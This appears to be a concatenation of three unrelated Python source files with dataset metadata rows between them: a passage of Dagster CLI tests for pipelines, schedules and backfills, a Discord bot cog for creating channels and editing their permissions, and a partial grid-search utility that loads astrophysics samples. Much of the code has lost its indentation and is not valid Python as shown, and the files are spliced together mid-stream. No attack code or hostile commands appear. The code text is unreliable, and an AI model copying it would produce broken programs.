'repository_yaml': None,
'python_file': script_relative_path('test_cli_commands.py'),
'module_name': None,
'fn_name': None,
},
no_print,
)
result = runner.invoke(
pipeline_list_command, ['-f', script_relative_path('test_cli_commands.py')]
)
assert result.exit_code == 2
def valid_execute_args():
return [
{
'repository_yaml': script_relative_path('repository_file.yaml'),
'pipeline_name': ('foo',),
'python_file': None,
'module_name': None,
'fn_name': None,
},
{
'repository_yaml': script_relative_path('repository_module.yaml'),
'pipeline_name': ('hello_cereal_pipeline',),
'python_file': None,
'module_name': None,
'fn_name': None,
},
{
'repository_yaml': None,
'pipeline_name': ('foo',),
'python_file': script_relative_path('test_cli_commands.py'),
'module_name': None,
'fn_name': 'define_bar_repo',
},
{
'repository_yaml': None,
'pipeline_name': ('hello_cereal_pipeline',),
'python_file': None,
'module_name': 'dagster_examples.intro_tutorial.repos',
'fn_name': 'define_repo',
},
{
'repository_yaml': None,
'pipeline_name': (),
'python_file': None,
'module_name': 'dagster_examples.intro_tutorial.repos',
'fn_name': 'hello_cereal_pipeline',
},
{
'repository_yaml': None,
'pipeline_name': (),
'python_file': script_relative_path('test_cli_commands.py'),
'module_name': None,
'fn_name': 'define_foo_pipeline',
},
{
'repository_yaml': None,
'pipeline_name': (),
'python_file': script_relative_path('test_cli_commands.py'),
'module_name': None,
'fn_name': 'foo_pipeline',
},
]
def valid_cli_args():
    """Command-line argv variants that should all successfully target a pipeline.

    CLI counterpart of valid_execute_args(): repository yaml (-y), python file
    (-f) plus function name (-n), and module (-m) plus function name, where the
    named function returns either a repository or a pipeline.
    """
    return [
        ['-y', script_relative_path('repository_file.yaml'), 'foo'],
        ['-y', script_relative_path('repository_module.yaml'), 'hello_cereal_pipeline'],
        ['-f', script_relative_path('test_cli_commands.py'), '-n', 'define_bar_repo', 'foo'],
        [
            '-m',
            'dagster_examples.intro_tutorial.repos',
            '-n',
            'define_repo',
            'hello_cereal_pipeline',
        ],
        ['-m', 'dagster_examples.intro_tutorial.repos', '-n', 'hello_cereal_pipeline'],
        ['-f', script_relative_path('test_cli_commands.py'), '-n', 'define_foo_pipeline'],
    ]
def test_print_command():
for cli_args in valid_execute_args():
execute_print_command(verbose=True, cli_args=cli_args, print_fn=no_print)
for cli_args in valid_execute_args():
execute_print_command(verbose=False, cli_args=cli_args, print_fn=no_print)
runner = CliRunner()
for cli_args in valid_cli_args():
result = runner.invoke(pipeline_print_command, cli_args)
assert result.exit_code == 0
result = runner.invoke(pipeline_print_command, ['--verbose'] + cli_args)
assert result.exit_code == 0
res = runner.invoke(
pipeline_print_command,
[
'--verbose',
'-f',
script_relative_path('test_cli_commands.py'),
'-n',
'define_bar_repo',
'baz',
],
)
assert res.exit_code == 0
def test_execute_mode_command():
runner = CliRunner()
add_result = runner_pipeline_execute(
runner,
[
'-y',
script_relative_path('../repository.yaml'),
'--env',
script_relative_path('../environments/multi_mode_with_resources/add_mode.yaml'),
'-d',
'add_mode',
'multi_mode_with_resources', # pipeline name
],
)
assert add_result
mult_result = runner_pipeline_execute(
runner,
[
'-y',
script_relative_path('../repository.yaml'),
'--env',
script_relative_path('../environments/multi_mode_with_resources/mult_mode.yaml'),
'-d',
'mult_mode',
'multi_mode_with_resources', # pipeline name
],
)
assert mult_result
double_adder_result = runner_pipeline_execute(
runner,
[
'-y',
script_relative_path('../repository.yaml'),
'--env',
script_relative_path(
'../environments/multi_mode_with_resources/double_adder_mode.yaml'
),
'-d',
'double_adder_mode',
'multi_mode_with_resources', # pipeline name
],
)
assert double_adder_result
def test_execute_preset_command():
runner = CliRunner()
add_result = runner_pipeline_execute(
runner,
[
'-y',
script_relative_path('../repository.yaml'),
'-p',
'add',
'multi_mode_with_resources', # pipeline name
],
)
assert 'PIPELINE_SUCCESS' in add_result.output
# Can't use -p with --env
bad_res = runner.invoke(
pipeline_execute_command,
[
'-y',
script_relative_path('../repository.yaml'),
'-p',
'add',
'--env',
script_relative_path(
'../environments/multi_mode_with_resources/double_adder_mode.yaml'
),
'multi_mode_with_resources', # pipeline name
],
)
assert bad_res.exit_code == 2
def test_execute_command():
for cli_args in valid_execute_args():
execute_execute_command(env=None, cli_args=cli_args)
for cli_args in valid_execute_args():
execute_execute_command(
env=[script_relative_path('default_log_error_env.yaml')], cli_args=cli_args
)
runner = CliRunner()
for cli_args in valid_cli_args():
runner_pipeline_execute(runner, cli_args)
runner_pipeline_execute(
runner, ['--env', script_relative_path('default_log_error_env.yaml')] + cli_args
)
res = runner.invoke(
pipeline_execute_command,
['-y', script_relative_path('repository_module.yaml'), 'hello_cereal_pipeline', 'foo'],
)
assert res.exit_code == 1
assert isinstance(res.exception, CheckError)
assert 'Can only handle zero or one pipeline args.' in str(res.exception)
def test_stdout_execute_command():
runner = CliRunner()
result = runner_pipeline_execute(
runner, ['-f', script_relative_path('test_cli_commands.py'), '-n', 'stdout_pipeline']
)
assert 'HELLO WORLD' in result.output
def test_stderr_execute_command():
runner = CliRunner()
result = runner_pipeline_execute(
runner, ['-f', script_relative_path('test_cli_commands.py'), '-n', 'stderr_pipeline']
)
assert 'I AM SUPPOSED TO FAIL' in result.output
def test_fn_not_found_execute():
with pytest.raises(DagsterInvariantViolationError) as exc_info:
execute_execute_command(
env=None,
cli_args={
'repository_yaml': None,
'pipeline_name': (),
'python_file': script_relative_path('test_cli_commands.py'),
'module_name': None,
'fn_name': 'nope',
},
)
assert 'nope not found in module' in str(exc_info.value)
def not_a_repo_or_pipeline_fn():
    """Fixture: a callable whose return value is neither a pipeline nor a repository."""
    return 'kdjfkjdf'
not_a_repo_or_pipeline = 123
def test_fn_is_wrong_thing():
with pytest.raises(DagsterInvariantViolationError) as exc_info:
execute_execute_command(
env={},
cli_args={
'repository_yaml': None,
'pipeline_name': (),
'python_file': script_relative_path('test_cli_commands.py'),
'module_name': None,
'fn_name': 'not_a_repo_or_pipeline',
},
)
assert str(exc_info.value) == (
'not_a_repo_or_pipeline must be a function that returns a '
'PipelineDefinition or a RepositoryDefinition, or a function '
'decorated with @pipeline.'
)
def test_fn_returns_wrong_thing():
with pytest.raises(DagsterInvariantViolationError) as exc_info:
execute_execute_command(
env={},
cli_args={
'repository_yaml': None,
'pipeline_name': (),
'python_file': script_relative_path('test_cli_commands.py'),
'module_name': None,
'fn_name': 'not_a_repo_or_pipeline_fn',
},
)
assert str(exc_info.value) == (
'not_a_repo_or_pipeline_fn is a function but must return a '
'PipelineDefinition or a RepositoryDefinition, or be decorated '
'with @pipeline.'
)
def runner_pipeline_execute(runner, cli_args):
    """Invoke `dagster pipeline execute` via the Click test runner; fail loudly on error."""
    result = runner.invoke(pipeline_execute_command, cli_args)
    if result.exit_code == 0:
        return result
    # CliRunner captures stdout, so surface it in the failure message.
    raise Exception(
        (
            'dagster pipeline execute commands with cli_args {cli_args} '
            'returned exit_code {exit_code} with stdout:\n"{stdout}" and '
            '\nresult as string: "{result}"'
        ).format(
            cli_args=cli_args, exit_code=result.exit_code, stdout=result.stdout, result=result
        )
    )
def test_scaffold_command():
for cli_args in valid_execute_args():
cli_args['print_only_required'] = True
execute_scaffold_command(cli_args=cli_args, print_fn=no_print)
cli_args['print_only_required'] = False
execute_scaffold_command(cli_args=cli_args, print_fn=no_print)
runner = CliRunner()
for cli_args in valid_cli_args():
result = runner.invoke(pipeline_scaffold_command, cli_args)
assert result.exit_code == 0
result = runner.invoke(pipeline_scaffold_command, ['-p'] + cli_args)
assert result.exit_code == 0
def test_default_memory_run_storage():
cli_args = {
'repository_yaml': script_relative_path('repository_file.yaml'),
'pipeline_name': ('foo',),
'python_file': None,
'module_name': None,
'fn_name': None,
}
result = execute_execute_command(env=None, cli_args=cli_args)
assert result.success
def test_override_with_in_memory_storage():
cli_args = {
'repository_yaml': script_relative_path('repository_file.yaml'),
'pipeline_name': ('foo',),
'python_file': None,
'module_name': None,
'fn_name': None,
}
result = execute_execute_command(
env=[script_relative_path('in_memory_env.yaml')], cli_args=cli_args
)
assert result.success
def test_override_with_filesystem_storage():
cli_args = {
'repository_yaml': script_relative_path('repository_file.yaml'),
'pipeline_name': ('foo',),
'python_file': None,
'module_name': None,
'fn_name': None,
}
result = execute_execute_command(
env=[script_relative_path('filesystem_env.yaml')], cli_args=cli_args
)
assert result.success
def test_run_list():
runner = CliRunner()
result = runner.invoke(run_list_command)
assert result.exit_code == 0
def test_run_wipe_correct_delete_message():
runner = CliRunner()
result = runner.invoke(run_wipe_command, input="DELETE\n")
assert 'Deleted all run history and event logs' in result.output
assert result.exit_code == 0
def test_run_wipe_incorrect_delete_message():
runner = CliRunner()
result = runner.invoke(run_wipe_command, input="WRONG\n")
assert 'Exiting without deleting all run history and event logs' in result.output
assert result.exit_code == 0
@schedules(scheduler=FilesytemTestScheduler)
def define_bar_scheduler():
return [
ScheduleDefinition(
"foo_schedule",
cron_schedule="* * * * *",
pipeline_name="test_pipeline",
environment_dict={},
)
]
def test_schedules_list_without_dagster_home():
runner = CliRunner()
result = runner.invoke(
schedule_list_command, ['-y', script_relative_path('repository_file.yaml')]
)
assert result.exit_code == 2
assert 'Error: $DAGSTER_HOME is not set' in result.output
def test_schedules_list():
runner = CliRunner()
with seven.TemporaryDirectory() as temp_dir:
with mock.patch.dict(os.environ, {"DAGSTER_HOME": temp_dir}):
result = runner.invoke(
schedule_list_command, ['-y', script_relative_path('repository_file.yaml')]
)
assert result.exit_code == 0
assert result.output == ('Repository bar\n' '**************\n')
def test_schedules_up():
runner = CliRunner()
with seven.TemporaryDirectory() as temp_dir:
with mock.patch.dict(os.environ, {"DAGSTER_HOME": temp_dir}):
result = runner.invoke(
schedule_up_command, ['-y', script_relative_path('repository_file.yaml')]
)
assert result.exit_code == 0
assert result.output == 'Changes:\n + foo_schedule (add)\n'
def test_schedules_up_and_list():
runner = CliRunner()
with seven.TemporaryDirectory() as temp_dir:
with mock.patch.dict(os.environ, {"DAGSTER_HOME": temp_dir}):
result = runner.invoke(
schedule_up_command, ['-y', script_relative_path('repository_file.yaml')]
)
result = runner.invoke(
schedule_list_command, ['-y', script_relative_path('repository_file.yaml')]
)
assert result.exit_code == 0
assert (
result.output == 'Repository bar\n'
'**************\n'
'Schedule: foo_schedule [STOPPED]\n'
'Cron Schedule: * * * * *\n'
)
def test_schedules_start_and_stop():
runner = CliRunner()
with seven.TemporaryDirectory() as temp_dir:
with mock.patch.dict(os.environ, {"DAGSTER_HOME": temp_dir}):
result = runner.invoke(
schedule_up_command, ['-y', script_relative_path('repository_file.yaml')]
)
result = runner.invoke(
schedule_start_command,
['-y', script_relative_path('repository_file.yaml'), 'foo_schedule'],
)
assert result.exit_code == 0
assert 'Started schedule foo_schedule with ' in result.output
result = runner.invoke(
schedule_stop_command,
['-y', script_relative_path('repository_file.yaml'), 'foo_schedule'],
)
assert result.exit_code == 0
assert 'Stopped schedule foo_schedule with ' in result.output
def test_schedules_start_all():
runner = CliRunner()
with seven.TemporaryDirectory() as temp_dir:
with mock.patch.dict(os.environ, {"DAGSTER_HOME": temp_dir}):
result = runner.invoke(
schedule_up_command, ['-y', script_relative_path('repository_file.yaml')]
)
result = runner.invoke(
schedule_start_command,
['-y', script_relative_path('repository_file.yaml'), '--start-all'],
)
assert result.exit_code == 0
assert result.output == 'Started all schedules for repository bar\n'
def test_schedules_wipe_correct_delete_message():
runner = CliRunner()
with seven.TemporaryDirectory() as temp_dir:
with mock.patch.dict(os.environ, {"DAGSTER_HOME": temp_dir}):
result = runner.invoke(
schedule_up_command, ['-y', script_relative_path('repository_file.yaml')]
)
result = runner.invoke(
schedule_wipe_command,
['-y', script_relative_path('repository_file.yaml')],
input="DELETE\n",
)
assert result.exit_code == 0
assert 'Wiped all schedules and schedule cron jobs' in result.output
result = runner.invoke(
schedule_up_command,
['-y', script_relative_path('repository_file.yaml'), '--preview'],
)
# Verify schedules were wiped
assert result.exit_code == 0
assert result.output == 'Planned Changes:\n + foo_schedule (add)\n'
def test_schedules_wipe_incorrect_delete_message():
runner = CliRunner()
with seven.TemporaryDirectory() as temp_dir:
with mock.patch.dict(os.environ, {"DAGSTER_HOME": temp_dir}):
result = runner.invoke(
schedule_up_command, ['-y', script_relative_path('repository_file.yaml')]
)
result = runner.invoke(
schedule_wipe_command,
['-y', script_relative_path('repository_file.yaml')],
input="WRONG\n",
)
assert result.exit_code == 0
assert 'Exiting without deleting all schedules and schedule cron jobs' in result.output
result = runner.invoke(
schedule_up_command,
['-y', script_relative_path('repository_file.yaml'), '--preview'],
)
# Verify schedules were not wiped
assert result.exit_code == 0
assert (
result.output
== 'No planned changes to schedules.\n1 schedules will remain unchanged\n'
)
def test_schedules_restart():
runner = CliRunner()
with seven.TemporaryDirectory() as temp_dir:
with mock.patch.dict(os.environ, {"DAGSTER_HOME": temp_dir}):
result = runner.invoke(
schedule_up_command, ['-y', script_relative_path('repository_file.yaml')]
)
result = runner.invoke(
schedule_start_command,
['-y', script_relative_path('repository_file.yaml'), 'foo_schedule'],
)
result = runner.invoke(
schedule_restart_command,
['-y', script_relative_path('repository_file.yaml'), 'foo_schedule'],
)
assert result.exit_code == 0
assert 'Restarted schedule foo_schedule' in result.output
def test_schedules_restart_all():
runner = CliRunner()
with seven.TemporaryDirectory() as temp_dir:
with mock.patch.dict(os.environ, {"DAGSTER_HOME": temp_dir}):
result = runner.invoke(
schedule_up_command, ['-y', script_relative_path('repository_file.yaml')]
)
result = runner.invoke(
schedule_start_command,
['-y', script_relative_path('repository_file.yaml'), 'foo_schedule'],
)
result = runner.invoke(
schedule_restart_command,
[
'-y',
script_relative_path('repository_file.yaml'),
'foo_schedule',
'--restart-all-running',
],
)
assert result.exit_code == 0
assert result.output == 'Restarted all running schedules for repository bar\n'
def test_multiproc():
with seven.TemporaryDirectory() as temp:
runner = CliRunner(env={'DAGSTER_HOME': temp})
add_result = runner_pipeline_execute(
runner,
[
'-y',
script_relative_path('../repository.yaml'),
'-p',
'multiproc',
'multi_mode_with_resources', # pipeline name
],
)
assert 'PIPELINE_SUCCESS' in add_result.output
def test_multiproc_invalid():
# force ephemeral instance by removing out DAGSTER_HOME
runner = CliRunner(env={'DAGSTER_HOME': None})
add_result = runner_pipeline_execute(
runner,
[
'-y',
script_relative_path('../repository.yaml'),
'-p',
'multiproc',
'multi_mode_with_resources', # pipeline name
],
)
# which is invalid for multiproc
assert 'DagsterUnmetExecutorRequirementsError' in add_result.output
class InMemoryRunLauncher(RunLauncher, ConfigurableClass):
    """Test double for RunLauncher: records 'launched' runs in a list, executes nothing."""
    def __init__(self, inst_data=None):
        self._inst_data = inst_data
        self._queue = []  # runs handed to launch_run, in call order
    def launch_run(self, _instance, run):
        # RunLauncher hook: record and echo the run back instead of executing it.
        self._queue.append(run)
        return run
    def queue(self):
        """Return the list of runs recorded so far."""
        return self._queue
    @classmethod
    def config_type(cls):
        # ConfigurableClass hook: this launcher accepts no config fields.
        return Shape({})
    @classmethod
    def from_config_value(cls, inst_data, config_value):
        # ConfigurableClass hook: rebuild from (empty) config.
        return cls(inst_data=inst_data,)
    @property
    def inst_data(self):
        return self._inst_data
@repository_partitions
def define_baz_partitions():
return [
PartitionSetDefinition(
name='baz_partitions', pipeline_name='baz', partition_fn=lambda: string.ascii_lowercase,
)
]
def backfill_execute_args(execution_args):
    """Build the kwargs dict for execute_backfill_command from CLI-style args.

    `pipeline_name`, when present and truthy, is wrapped in a 1-tuple (the
    command expects a tuple of names); every other key is copied through.
    """
    args = {
        'repository_yaml': script_relative_path('repository_file.yaml'),
        'noprompt': True,
    }
    if execution_args.get('pipeline_name'):
        args['pipeline_name'] = (execution_args['pipeline_name'],)
    args.update({k: v for k, v in execution_args.items() if k != 'pipeline_name'})
    return args
def backfill_cli_runner_args(execution_args):
    """Build argv for the `pipeline backfill` Click command from CLI-style args.

    The pipeline name (if any) is a positional argument; every other key
    becomes a long option with underscores turned into dashes.
    """
    argv = ['-y', script_relative_path('repository_file.yaml'), '--noprompt']
    if execution_args.get('pipeline_name'):
        argv.append(execution_args['pipeline_name'])
    for key, value in execution_args.items():
        if key != 'pipeline_name':
            argv += ['--{}'.format(key.replace('_', '-')), value]
    return argv
def run_test_backfill(
    execution_args, expected_count=None, error_message=None, use_run_launcher=True
):
    """Drive the backfill command twice (API + CLI) against an ephemeral instance.

    If *error_message* is given, both invocations must fail with a UsageError
    containing it (CLI exit code 2); otherwise both must succeed, and when
    *expected_count* is given exactly that many runs must have been handed to
    the in-memory run launcher.
    """
    runner = CliRunner()
    run_launcher = InMemoryRunLauncher() if use_run_launcher else None
    with seven.TemporaryDirectory() as temp_dir:
        # Throwaway instance: all storages in memory or under temp_dir.
        instance = DagsterInstance(
            instance_type=InstanceType.EPHEMERAL,
            local_artifact_storage=LocalArtifactStorage(temp_dir),
            run_storage=InMemoryRunStorage(),
            event_storage=InMemoryEventLogStorage(),
            compute_log_manager=NoOpComputeLogManager(temp_dir),
            run_launcher=run_launcher,
        )
        # Patch the global instance lookup so both code paths use this instance.
        with mock.patch('dagster.core.instance.DagsterInstance.get') as _instance:
            _instance.return_value = instance
            if error_message:
                with pytest.raises(UsageError) as error_info:
                    execute_backfill_command(backfill_execute_args(execution_args), no_print)
                assert error_info and error_message in error_info.value.message
            result = runner.invoke(
                pipeline_backfill_command, backfill_cli_runner_args(execution_args)
            )
            if error_message:
                assert result.exit_code == 2
            else:
                assert result.exit_code == 0
                if expected_count:
                    assert len(run_launcher.queue()) == expected_count
def test_backfill_no_run_launcher():
args = {'pipeline_name': 'baz'} # legit partition args
run_test_backfill(
args, use_run_launcher=False, error_message='A run launcher must be configured'
)
def test_backfill_no_pipeline():
args = {'pipeline_name': 'nonexistent'}
run_test_backfill(args, error_message='No pipeline found')
def test_backfill_no_partition_sets():
args = {'pipeline_name': 'foo'}
run_test_backfill(args, error_message='No partition sets found')
def test_backfill_no_named_partition_set():
args = {'pipeline_name': 'baz', 'partition_set': 'nonexistent'}
run_test_backfill(args, error_message='No partition set found')
def test_backfill_launch():
args = {'pipeline_name': 'baz', 'partition_set': 'baz_partitions'}
run_test_backfill(args, expected_count=len(string.ascii_lowercase))
def test_backfill_partition_range():
args = {'pipeline_name': 'baz', 'partition_set': 'baz_partitions', 'from': 'x'}
run_test_backfill(args, expected_count=3)
args = {'pipeline_name': 'baz', 'partition_set': 'baz_partitions', 'to': 'c'}
run_test_backfill(args, expected_count=3)
args = {'pipeline_name': 'baz', 'partition_set': 'baz_partitions', 'from': 'c', 'to': 'f'}
run_test_backfill(args, expected_count=4)
def test_backfill_partition_enum():
args = {'pipeline_name': 'baz', 'partition_set': 'baz_partitions', 'partitions': 'c,x,z'}
run_test_backfill(args, expected_count=3)
| helloworld/continuous-dagster | deploy/dagster_modules/dagster/dagster_tests/cli_tests/test_cli_commands.py | test_cli_commands.py | py | 31,036 | python | en | code | 2 | github-code | 36 |
14029268104 | import typing
import discord
from discord.ext import commands
from .general import is_staff, free_category, free_category_create
class FreeCategory(commands.Cog):
__slots__ = ('client', 'name', 'staff',)
permissions_jp = {
# 'create_instant_invite': '招待を作成',
'manage_channels': 'チャンネルの管理',
'manage_roles': '権限の管理',
}
permissions_jp_text = {
'read_messages': 'メッセージを読む',
'send_messages': 'メッセージを送信',
'manage_messages': 'メッセージの管理',
'embed_links': '埋め込みリンク',
'attach_files': 'ファイルを添付',
'read_message_history': 'メッセージ履歴を読む',
'external_emojis': '外部の絵文字の使用',
'add_reactions': 'リアクションの追加',
}
permissions_jp_voice = {
'read_messages': 'チャンネルを見る',
'connect': '接続',
'speak': '発言',
'mute_members': 'メンバーをミュート',
'deafen_members': 'メンバーのスピーカーをミュート',
'move_members': 'メンバーを移動',
'use_voice_activation': '音声検出を使用',
'priority_speaker': 'プライオリティスピーカー'
}
    def __init__(self, client, name=None,):
        """Store the bot reference and the cog name (defaults to the class name)."""
        self.client: commands.Bot = client
        self.name = name if name is not None else type(self).__name__
    @property
    def category(self):
        """The free-channels category, looked up by the `free_category` channel ID.

        NOTE(review): `get_channel` returns None when the channel is not in the
        bot's cache — callers appear to assume it always resolves; confirm.
        """
        return self.client.get_channel(free_category)
    @property
    def create_channel(self):
        """The 'create' channel, looked up by the `free_category_create` channel ID.

        NOTE(review): unused within the visible portion of this cog; possibly
        consumed by `cedit` flows or other modules — confirm before removing.
        """
        return self.client.get_channel(free_category_create)
    @commands.command(name='ftcc')
    async def free_text_channel_create(self, ctx, *, name):
        """Command `ftcc`: create a free text channel called *name*.

        On success, replies (in Japanese) with the channel mention and how many
        of the category's 50 channel slots remain.
        """
        channel = await self._free_channel_create(ctx, name)
        # _free_channel_create returns None when the category is full (it has
        # already messaged the user), so only announce on success.
        if channel is not None:
            await ctx.send(
                '作成しました。\n{0}\nあと{1}チャンネル作成可能。'
                .format(channel.mention, 50 - len(channel.category.channels))
            )
    async def _free_channel_create(self, ctx, name):
        """Create a text channel named *name* inside the free category.

        Returns the new channel, or None when the category already holds 50
        channels (the cap this cog enforces, matching Discord's per-category
        limit), in which case the user is told to contact staff.
        """
        category = self.category
        if len(category.channels) >= 50:
            await ctx.send(
                "チャンネルが一杯で作成できません。\n"
                "運営に連絡してください。"
            )
            return
        guild = category.guild
        # Per-target permission overwrites for the new channel:
        #   - the bot gets all permissions; the requesting author gets bitmask
        #     66448721 (presumably manage/read/write-level access — TODO confirm),
        #   - @everyone and role 515467411898761216 are denied everything,
        #   - role 515467425429585941 is allowed bitmask 37080128 and denied
        #     the complementary bits.
        # NOTE(review): the role IDs and bitmasks are guild-specific magic
        # values; verify against the target guild before reuse.
        overwrites = {
            self.client.user:
                discord.PermissionOverwrite.from_pair(discord.Permissions.all(), discord.Permissions.none()),
            ctx.author:
                discord.PermissionOverwrite.from_pair(discord.Permissions(66448721), discord.Permissions.none()),
            guild.default_role:
                discord.PermissionOverwrite.from_pair(discord.Permissions.none(), discord.Permissions.all()),
            guild.get_role(515467411898761216):
                discord.PermissionOverwrite.from_pair(discord.Permissions.none(), discord.Permissions.all()),
            guild.get_role(515467425429585941):
                discord.PermissionOverwrite.from_pair(
                    discord.Permissions(37080128), discord.Permissions(2 ** 53 - 37080129)),
        }
        return await guild.create_text_channel(name, overwrites=overwrites, category=category)
@commands.command()
async def cedit(self, ctx,
channel: typing.Union[discord.TextChannel, discord.VoiceChannel] = None):
EMOJI = 0x1f1e6 # 絵文字定数(これを足したり引いたりするとリアクション的にうまくいく)
EMBED_TITLE = 'チャンネル権限編集'
if channel is None:
channel = ctx.channel
if (
(
ctx.author in channel.overwrites
and channel.overwrites_for(ctx.author).manage_roles is not False
) # メンバーの追加設定があり、かつ「権限の管理」がNone
or await self.client.is_owner(ctx.author) # オーナー
or await is_staff(ctx.author) # スタッフチーム
):
all_commands = (
'新規に役職を追加設定',
'新規にユーザーを追加設定',
'現在設定されている追加設定の変更',
'現在設定されている追加設定の削除'
)
emojis = [chr(i + EMOJI) for i in range(len(all_commands))]
embed = discord.Embed(
title=EMBED_TITLE,
description='\n'.join(
'{0}:{1}'.format(i, e)
for i, e in zip(emojis, all_commands)
)
)
embed.set_footer(text='対象チャンネル:{0.name}\nチャンネルID:{0.id}'.format(channel))
message = await ctx.send(embed=embed)
[await message.add_reaction(e)
for e in emojis]
def check(r, u):
return (
r.me and ctx.author == u
and r.message.id == message.id
and r.message.channel == message.channel
)
reaction, _ = \
await self.client.wait_for('reaction_add', check=check)
await message.delete()
num_command = ord(reaction.emoji) - EMOJI
if 0 <= num_command <= 1:
# ユーザーまたは役職の追加
if num_command == 0:
target_type = '役職'
else:
target_type = 'ユーザー'
description1 = ('チャンネルの追加設定に{0}を追加します。\n'
'追加したい{0}を入力してください').format(target_type)
message = await ctx.send(description1)
def check1(m):
return (
m.channel == ctx.channel
and m.author == ctx.author
)
message2 = await self.client.wait_for('message', check=check1)
await message.delete()
if num_command == 0:
converter = commands.RoleConverter()
else:
converter = commands.MemberConverter()
try:
target = await converter.convert(ctx, message2.content)
except commands.BadArgument:
await ctx.send(
'指定した{0}が見つかりませんでした'.format(target_type)
+ 'もう一度やり直して下さい。'
)
return
elif 2 <= num_command <= 3:
action = '変更' if num_command == 2 else '削除'
description1 = (
'追加設定を{0}します\n'
'{0}したい役職、またはユーザーを選んでください'
).format(action)
embed = discord.Embed(title=EMBED_TITLE, description=description1)
overwrites = channel.overwrites
def func2(_page=0):
end = (_page + 1) * 17
if len(overwrites) < end:
end = len(overwrites)
start = _page * 17
tg = [i for i in overwrites.keys()][start:end]
try:
tg.remove(self.client.user)
except ValueError:
pass
desc = '\n'.join(
'{0}:{1}'.format(chr(i + EMOJI), t.mention)
for i, t in enumerate(tg)
)
return tg, desc
page = 0
targets, description1 = func2(page)
embed.add_field(name='役職・ユーザー一覧', value=description1)
message = await ctx.send(embed=embed)
[await message.add_reaction(chr(i + EMOJI))
for i in range(len(targets))]
await message.add_reaction('\U0001f519')
await message.add_reaction('\U0001f51c')
await message.add_reaction('\u274c')
def check3(r, u):
return (
u == ctx.author
and r.me
and r.message.channel == message.channel
and r.message.id == message.id
)
while True:
new_page = page
reaction, user = \
await self.client.wait_for('reaction_add', check=check3)
await message.remove_reaction(reaction, user)
if reaction.emoji == '\U0001f519':
new_page = page - 1
elif reaction.emoji == '\U0001f51c':
new_page = page + 1
elif reaction.emoji == '\u274c':
await message.delete()
await ctx.send('中止しました。')
return
else:
break
if new_page != page:
new_targets, description1 = func2(_page=new_page)
if description1 != '':
embed.set_field_at(
0, name='役職・ユーザー一覧', value=description1
)
await message.edit(embed=embed)
page = new_page
targets = new_targets
await message.delete()
target = targets[ord(reaction.emoji) - EMOJI]
if num_command <= 2:
perms_jp = self.permissions_jp.copy()
perms_jp.update(
self.permissions_jp_text
if isinstance(channel, discord.TextChannel)
else self.permissions_jp_voice
)
perms = tuple(perms_jp.keys())
def func1(overwrite):
description = ''
n = 0
for en, jp in perms_jp.items():
try:
value = getattr(overwrite, en)
except AttributeError:
continue
else:
description += '{0}'.format(chr(n + EMOJI))
description += jp
if value:
description += ':\u2705\n'
elif value is None:
description += ':\u2b1c\n'
else:
description += ':\u274c\n'
n += 1
return description
overwrite1: discord.PermissionOverwrite = channel.overwrites_for(target)
embed = discord.Embed(
title=EMBED_TITLE,
description='{0}の権限設定を変更します'.format(target.mention)
)
embed.add_field(name='権限一覧', value=func1(overwrite1))
message3 = await ctx.send(embed=embed)
[await message3.add_reaction(chr(i + EMOJI))
for i in range(len(perms))]
await message3.add_reaction('\u2705')
await message3.add_reaction('\u274c')
def check2(reaction, user):
return (
user == ctx.author
and reaction.me
and reaction.message.channel == message3.channel
and reaction.message.id == message3.id
)
loop = True
while loop:
reaction, user = await self.client.wait_for('reaction_add', check=check2)
if reaction.emoji == '\u2705':
loop = False
continue
elif reaction.emoji == '\u274c':
await message3.delete()
await ctx.send('中止しました。')
break
await message3.remove_reaction(reaction, user)
perm = perms[ord(reaction.emoji) - EMOJI]
value = getattr(overwrite1, perm)
if value:
value = False
elif value is None:
value = True
else:
value = None
if perm == 'manage_roles' and value:
value = False
overwrite1.update(**{perm: value})
embed.set_field_at(0, name='権限一覧', value=func1(overwrite1))
await message3.edit(embed=embed)
else:
await message3.delete()
await channel.set_permissions(target, overwrite=overwrite1)
await ctx.send('権限を変更しました。')
elif num_command == 3:
await channel.set_permissions(target, overwrite=None)
await ctx.send('権限を削除しました。')
else:
await ctx.send('あなたはそれをする権限がありません。')
| Kesigomon/Skyline_py | cogs/freecategory.py | freecategory.py | py | 13,622 | python | en | code | 7 | github-code | 36 |
5032205330 | import os
import sys
import numpy as np
import matplotlib.pyplot as plt
import getdist
#from getdist import plots, MCSamples
sys.path.append(
"{}/utils".format(os.environ["GitHub"])
)
import list_utils as list_utils
import directory_utils as directory_utils
# NOTE: A LOT NEED TO CHANGE HERE ...
# TODO: The samples in the 2dmarginal plot need not be in a grid.
def get_list_of_directory_trees_in_directory(directory):
return [
x[0]
for x in os.walk(directory)
]
def get_subphase_directory(x_i, x_j, y_i, y_j):
str_0 = "galaxies_subhalo_mass_centre_0_" + "{0:.2f}".format(x_i) + "_" + "{0:.2f}".format(x_j)
str_1 = "galaxies_subhalo_mass_centre_1_" + "{0:.2f}".format(y_i) + "_" + "{0:.2f}".format(y_j)
return "{}_{}".format(
str_0,
str_1
)
def get_subphase_directories_for_gridsearch(phase_directory, xmin, xmax, ymin, ymax, number_of_steps):
x = np.linspace(xmin, xmax, number_of_steps + 1)
y = np.linspace(ymin, ymax, number_of_steps + 1)
directories = []
for i in range(number_of_steps):
directories_temp = []
for j in range(number_of_steps):
subphase_directory = get_subphase_directory(
x_i=x[i], x_j=x[i+1], y_i=y[j], y_j=y[j+1]
)
# TODO: sanitize the phase directory
phase_directory = directory_utils.sanitize_directory(
directory=phase_directory
)
subphase_directory = phase_directory + "/" + subphase_directory
if not os.path.isdir(subphase_directory):
raise IOError(subphase_directory + " does not exist")
list_of_directory_trees_filtered = list_utils.filter_input_list_of_strings_after_split_with_ending_string(
input_list_of_strings=get_list_of_directory_trees_in_directory(
directory=subphase_directory
),
split_character="/",
ending_string="optimizer_backup"
)
if len(list_of_directory_trees_filtered) == 1:
if not os.listdir(list_of_directory_trees_filtered[0]):
directories_temp.append(None)
else:
directories_temp.append(list_of_directory_trees_filtered[0])
if len(list_of_directory_trees_filtered) < 1:
directories_temp.append(None)
#raise ValueError("optimizer_backup does not exist")
if len(list_of_directory_trees_filtered) > 1:
raise ValueError("THIS IS WEIRD...")
directories.append(directories_temp)
return directories
def get_samples_from_subphase_directories(directories):
samples = []
for i in range(np.shape(directories)[0]):
samples_temp = []
for j in range(np.shape(directories)[1]):
if directories[i][j] is not None:
directory = directories[i][j] + "/multinest"
try:
sample = getdist.mcsamples.loadMCSamples(directory)
#print(sample.__dict__)
except:
sample = None
else:
sample = None
samples_temp.append(sample)
samples.append(samples_temp)
return samples
